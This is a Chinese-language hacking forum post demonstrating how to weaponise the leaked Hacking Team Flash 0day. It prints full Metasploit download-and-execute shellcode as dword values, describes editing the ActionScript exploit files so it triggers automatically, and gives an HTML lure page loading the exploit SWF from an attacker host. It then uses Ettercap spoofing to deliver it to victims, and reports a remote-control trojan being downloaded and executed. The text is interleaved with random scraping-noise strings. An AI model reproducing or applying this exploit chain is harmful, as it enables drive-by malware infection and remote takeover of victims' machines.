找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1355|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- x$ ^- H3 e, L5 K' w4 M 三、flash 0day之手工代码修改制作下载者实例入侵演示 0 [! C; Y J6 S/ R* N) c2 [

" A( J' }5 a/ {, g- P& O

1 q; I% Y# F6 ^ 利用到的工具: ' O l, i0 }9 A0 L7 w5 p. L5 ?: r/ J

3 q: [. N3 o& o* ?& B5 W3 x1 y

3 ]- |: F$ P+ x g Msf 6 ?7 N% q2 Q: Y9 B) C; ?

2 s3 B+ C2 `' M

! t3 G% F% c9 [9 Z8 ?. w. z Ettercap 6 i1 n. T5 i' S9 t3 T2 Z* M3 ~

6 d- B- A3 H8 B' m

9 e0 X' K. O V1 |5 C. D Adobe Flash CS6 7 [6 E/ y/ u8 `( N

3 n3 y, J" k# Q/ j a+ {

# w6 `4 x+ R2 W5 r8 E9 E Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 + _3 F+ D D' h% N5 _

9 Q9 c8 T/ d7 `! a

& z. B( Z- w0 H( G$ A Q 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options + @# k! _- W Z7 f8 Q

4 f8 C" t: t; U3 r% j2 ~7 K- X$ a

' r2 L0 c S" V4 q6 G' A 如图: 7 X& v, D0 _6 x) g

( r5 M3 g7 J( d2 D+ Q5 i

! _ A: s2 i6 V8 q( b0 R0 ]# m   * b& a- b w9 d# J

3 E& ^% F8 S9 C$ {3 N

2 m2 f) o- o$ P+ N+ v- J; e8 G   Z3 E& ^, s0 Z( ]/ N6 I

- H( [ |- v1 ?# u: Y9 {- m

% U; K$ P+ M4 u5 m2 B: W 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) O- D# c, {) O2 Y f+ B) {

& t) J+ P, Q. E9 f

* B. P% ^' B/ @) v: N5 V5 l   % s0 Y5 M5 W# K" q1 {5 s- {

& j0 m( u2 K6 e h* ^

& X3 m8 ~; k; d   9 C q' @+ I6 s. g% ]8 v1 L3 I

. }. M3 i1 Q" Z& ] X! q

4 l* M7 e$ Z* P: I9 L 然后执行generate -t dword生成shellcode,如下: 5 J& W* x Y+ x$ x9 Y1 o5 L7 S

7 Y; o7 S' T( Z( e, Y( n3 Y- K& C

: Q% M% k0 h- F1 k) ^. r   . ]) T% l: Y2 X4 G( k

; v8 R$ |# {$ {3 J w" `+ R

1 W' }% [6 u3 Y# D+ J1 u- z 复制代码到文本下便于我们一会编辑flash exp,如下: , [2 ]. X: ]" V) }1 [( _- U5 R3 A

5 A4 U, [* v( j" L3 q

1 B* T, q# v5 H 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, , _9 w3 z X5 Z& Y! L& n

- P& I; o' K! L6 _

2 ?0 D, Z8 {4 j$ R 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ; R r" L" F, p# Q" L* a2 m

8 W/ y# m- {6 q# D! w, w

# v* U7 C. F' n) _5 M2 ^' R5 E6 z9 u( A, M 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ( ?- a" G- R# B* m* I- b

4 L4 c& k, D4 Z

v/ j; G/ F% |+ H H* L P% J 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 4 v' E" u' V( D. t

$ z, i2 Y7 @2 x5 q, n

7 Q# B0 `: F6 R/ g9 D 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 9 R [6 J) u" Z1 B' U5 j9 O3 M

5 J* C2 q$ J0 G C

4 ]6 H- }8 H* N) E. t 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 5 \: S; n* \: f: Y. F" I2 A' R

2 F# Q- b C, h, a2 W: J

7 ~, s1 \3 i: `5 o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 2 I% o r* E% I. x: S

$ z2 s" D9 z j. K' K( h0 Z

7 a! L. |$ w0 |5 V, g9 H+ z 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' P: G" M% X' u, U4 O

6 L2 [0 H, C- i2 ^

4 G+ q9 _5 Y' K" X0 U, j' v 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ! p2 c: L+ D, F! y

D9 R! a4 `8 b2 b8 Y, U! p

$ ]- S; s7 {# x5 t8 T 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 4 O7 k# [* l4 e Q; p6 K7 w- f

; S1 R4 `, B q' v2 J+ v; R

- @( B( M% l' {& h 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 7 @& _! T u+ s' ^( b

b& z$ \% b2 f0 v& n

( l0 h) ?' }, n7 r5 Z 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + l* H+ e" [$ u; n, n" c7 R) S

( w |6 k4 D) n' x5 _2 j- d! p% S+ \

1 j- ?8 o5 Y- R5 S: D 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ! N, u- H0 m2 G7 J( b

0 \- s% X1 y1 j ^" w

. P$ }5 Q8 p7 B) D6 ?( Q, H 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + c3 Q2 k. J! Z& D

8 l& c3 q t+ D% C7 H

4 ]) T& l+ R& B9 J o2 a   h" l) H( r# f. W, Q

4 m1 K1 h- M* {7 M

" x7 |: }- @. Q# S% N) Y' j   * l: x. G# r$ _

1 ]5 _; \- i& A7 i9 ^8 y

/ u/ E# J! ]6 x5 y1 r/ P 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 3 a- i' I! n' k# q' B

# U U* ^8 B, O z4 C

8 `& h: g2 b; |, T) h: s9 }5 @/ N( b7 Z   5 q7 u9 n- H, g/ \: J* \

6 q/ b; Y% D4 j. T3 L. n$ w

& G8 c Y; p5 f+ ~ 先修改ShellWin32.as,部分源代码如图: 2 R4 [) L# c' c3 ]) Z$ i

9 h7 i' J4 n0 O5 W" i) R9 O

# x' o" i: e/ o. i   . ?$ A1 o8 s( g7 X9 h8 @

, O: Y: r$ C4 j1 W; B* a

5 a) H" W4 y6 _1 t' T6 ` 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : i$ q% ^; a- y0 Y/ ~1 }

/ s7 t& F5 O4 [: ^+ e6 N

+ O* n# T8 W! K   7 P- k8 w& y6 Z0 \* O

5 Z" ]0 I6 q5 u: p( K% ]% f# f

1 T/ [# ^1 G5 } 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: : k! F+ F- i- Z1 ]9 s' L. X

$ M' v* y9 ~' U, @; M V* y! a

! }4 |* s: w3 U5 q) E3 G0 m$ ?0 S   H' `$ ? }6 D) S R0 F

1 ~, f* ^; n7 q! z% V1 X

/ z" Y2 M9 H- x# k' S 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 6 e5 [9 G1 f0 [5 j

0 `1 c0 f7 v; [' I0 Q

/ k/ O0 K" @0 f2 P   / ]" p5 q& z: @6 S

3 J$ K: Y5 e- l4 { F, A

2 Y; _2 i2 N. v# S   / F' H u+ w9 |" e0 z2 v8 m

" X& @$ U" f% P" K- G

9 i+ Z0 A3 R$ }1 j* Q8 m$ M5 D   ' y0 }; C9 Q/ ?& y$ l

% ^! ?2 J U/ h" O

) K7 M) Q6 F8 G+ M0 a+ P) z 然后点保存,下面我们来编译一下,打开 : Y$ ^9 Y0 ^4 R8 V V' x

8 m9 ]4 h8 _8 z. f% w9 p. [- [

3 h) J* Q/ {3 J exp1.fla然后点文件-发布,看看编译没错误 , S; ~3 Z* j2 r9 V8 e

4 f. J0 B. s, b/ O

. |' v$ D2 O# o3 F) O5 I   % T* v( F' I. d+ e

7 Q" x* Q3 k' y) U, W

8 k6 ^7 t; C( D- N5 j% p, X1 q   # }! `4 |6 `/ M* D$ \- f

# p, S4 M& j8 d* u j* I1 ]8 ?# N1 H

; D& w( @ ]! b" d3 e/ k   & m+ o( A& t) u0 P. g& Y

1 {' K* Q7 x+ m; A0 e' S8 i

6 @' ^1 P( y/ u$ x$ D, U   1 q2 s' w4 j, U- k! K. n' l! C

Q# [) L. e5 I& g" |& U! g

) E. O+ x& W+ w# `5 y# N 然后我们把生成的 * `5 A, ?/ _% f( ^$ R

- `+ c. N1 g+ b0 J

7 y2 G* k1 f1 q- G6 z7 P exp1.swf丢到kailinux /var/www/html下: , _4 \8 s' v# h" G2 a* p

9 t$ {( i x1 @ W; U7 `$ q

8 ~2 [$ P; B& m; h7 {/ I 然后把这段代码好好编辑一下 8 O/ u5 a6 S) _. x

9 U' [! X$ T4 L. s

; Z5 m, h$ D! M0 s% u   " h7 z- x2 m1 U

1 ~: ?+ t7 T" v X+ H

3 P0 ?, A- R3 y' p, y0 j& i" x' q% S   . z. `6 r! n" `9 m$ I: I

3 Z: l3 p9 Q, Y- N5 ]

0 E6 O6 R7 t2 s: i   4 z: \# C% E x1 p8 R

$ V8 p; B+ y7 R) H

6 P5 o% |" u. W2 V z/ j: E+ L   5 H9 Y. Q! d& |- h* O

Z. _; g9 G/ @* H& x6 T8 F& Q4 L

: \) G) A6 I( B: H- T   0 P: R7 z$ z6 S. r0 p7 x

7 O1 v* f0 a4 m* o+ d

' k. d1 D6 V# _. a- ?- T8 n# p) s9 c   % k7 c* W. t* ?6 R r

& ~7 `7 _: d" D5 }" y

R: d4 k0 h& I. E/ M9 h5 w <!DOCTYPE html> ' t7 S/ s9 Y# b) N2 V4 f6 s- c

8 o6 W+ z* B; l$ x1 m# F

/ l" [3 \" X6 T7 k% @2 m <html> : K( o3 P- B. B9 L! S

# Z9 c" c1 g& |! d) W/ u9 ?% ?3 O G, b

& S" n* _' X# p' o* L; E# r <head> : `* D1 e* y6 h( T5 q

% E& R7 |/ q9 C# m" R

* H, J: C1 k/ S3 @ <meta http-equiv="Content-Type" content="text/html; ( K+ p# f+ r, [& Y. @9 ]0 F, F

" Z$ U0 a2 a1 `. c/ \2 E, u" N

2 z. e( y R: s; ^. U, X3 i charset=utf-8"/> 7 M% r7 I* Z- s* C

% n. G. Y; i5 u ~5 [- O9 G

1 a" R1 c B' P6 P( U4 F </head> 6 g: _, l/ J) O6 O

! e" j! D; Y' V; K5 W& P

: \% t' c+ _, W; K- a' k8 X ^ <body> 1 @4 X9 }" |% U: G

1 T4 n5 [ `7 |$ {

5 {. r" t: u: C( O( w% ~ <h2> Please wait, the requested page is loading...</h2> , _7 U, [9 u5 v4 d" p' X$ O& f

" _# ?9 L' k! d4 k9 s- W9 q( O1 S/ R

3 Y3 l- G9 C4 O! T, X$ |* e <br> 2 l1 M3 Z/ Z$ ]

p. v! d) N! d1 T2 H9 e

* v4 H( e% G, ?2 B$ E) p <OBJECT : @9 y1 N; r; x0 E% a9 G

6 G* ^ t3 o, p& H G f

' f( q E. E ]3 |7 I5 t classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 6 m5 M/ D: x2 b3 b$ Y* ]( @5 J: }

3 ], ~; ?. D! l ^5 G6 H

, D* g$ l9 W( n/ @+ \3 V9 d VALUE="http://192.168.0.109/exp1.swf"></OBJECT> / I( k+ v* k; w1 M1 r- E

: t9 G# E# V& G$ ?1 D

2 ?6 p9 B# j, [% n: e5 ^9 t </body> * S) _/ q5 M* E5 d: C

7 J- e/ y! C3 {* z

. G0 A/ i) ^/ `3 W# Z5 U" k <script> $ i; n/ O. h+ O: Y7 N0 b3 Q

5 r) G" Q/ P) |) a/ ~ r

* w5 M9 N! C- P( x9 p- z     setTimeout(function () { % _" W1 @% Y! d, L' y

|/ D0 C# Z) {7 z: W

0 q- Q ^: o# V) X6 f          [: y; l& W. s1 ?8 U/ R# @

x1 ^+ B/ Y# {2 F R' `% L: H9 F3 c

2 [3 [1 l* Q5 b window.location.reload(); 9 d1 C$ b2 c7 x+ K' ^

) L( X2 x. J6 Q9 ?

' [$ Y, J5 G6 F3 L( S     }, 10000); & q1 D) n3 d4 d" l2 n0 D

' o- E9 j7 e8 h0 d5 l0 r9 Q# w: H

; M9 Q) K9 ^. G D# Y% l, s   8 m. n; r: E" T

7 E5 W- d+ E8 n2 a

0 w9 [3 t) ^ y </script> ( n+ Y* h4 v0 \# b B

4 b, W. T3 N' q: s

- m7 k( W2 w5 D, Q </html> - P+ Z3 c4 x. x; O0 l2 T; v

3 |, f$ t, B8 ~! R. P

3 ^- g% T% v4 p3 ?+ C: n   ; |9 \( y- f. N/ o! l# Y; L

" o1 @. G$ C* N2 S

0 d- x$ l+ L& H5 P& a 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 0 ~ E$ }: ^, o5 ?4 W. e

% a6 x$ z5 }% k) K a4 M

4 A; P) P }' n6 M' y! u   ; d" g$ r x* x9 m6 }0 c* ^

: ]# W/ T- o( A% ^, R4 k' k

% a$ \1 e+ M u* f   $ @0 z7 ?9 u8 n+ S

$ L) [* L5 Q. }0 V/ r7 \& A2 W

2 p, j/ `) I+ X2 G6 K   . P& i* v# O' B9 k. b2 I1 M

h( A$ ^ v8 f/ _% ?- C5 G

, [5 k1 ^) {6 _- ]9 h1 C8 u   5 V$ `) k' f' g) Q( y& d5 M0 |0 G

$ d1 x$ g# S4 B: T+ X

+ q, e" s4 V) M& W: |. s   + t% J, H3 A$ [0 I: t' ^+ o

- B. v# d6 ?8 V# M3 D8 h

0 R6 U7 Q0 o* y, J% \' P$ x 下面我们用ettercap欺骗如图: 9 t9 @1 {3 X0 G$ L+ j J L

) q. O+ H1 E% u

" W) y, L+ F0 O- Z7 e   5 o2 d# z- Q2 `; i# W

8 J% ^7 L" t- j" k6 e: e0 o

. D5 B+ n* p3 O$ ~   : H6 K9 j& o& n3 Y, W$ T* m) c' E6 g

4 p0 d) d8 Y' N$ @& N6 c

& \4 d" W3 X4 n( ^* ` 下面我们随便访问个网站看看: & o n" u" s' ~$ y9 A$ I

) X4 ^8 k" h* B

; Y5 ]* ~( v/ M! ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: : _' Z( T9 @. Q8 O" t' s

& k* }1 W( o7 I. u( J9 \9 J

$ F* K2 _1 {5 v   & i4 @/ J, S+ n. Q3 l& ?3 r x/ n

3 ?* q# w0 {- D7 I4 N! v

. l6 a" Y' w/ m9 @# v3 W2 ~; m 我们看另一台, : H5 `& m: u* x+ H- [% I

& \5 _7 b, q$ Q9 `! O5 l

- [6 m/ a9 y" x* Q8 U1 \1 O8 S 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 * x7 T; }/ H( O/ {5 R8 Y/ ]+ o* G

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表